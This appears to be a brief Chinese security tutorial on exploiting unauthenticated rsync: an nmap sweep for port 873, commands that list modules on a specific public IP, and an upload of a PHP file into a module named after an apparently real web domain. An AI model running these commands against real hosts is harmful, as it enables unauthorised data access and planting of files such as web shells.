注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。

[TOC]

Rsync 未授权访问漏洞

描述: 安全之默认密码登陆之Rsync未授权访问。

  • 1.rsync默认的端口是873,可以使用nmap扫描IP是否开放该端口,当找到开放端口后,查看时候可默认口令登陆,使用命令查看:
    1
    2
    3
    4
    5
    6
    7
    8
    # 扫描
    nmap -n --open -p 873 x.x.x.x/24

    # 验证
    rsync ip::

    # 显示二级文件
    rsync -av 115.29.246.254::

2.既然是同步文件,自然有选择查看、上传或者下载的能力需视权限设定

1
2
# 同步数据到本地
rsync -vzrtopg --progress ./sxx.php 172.17.16.24::www/support.meitu.com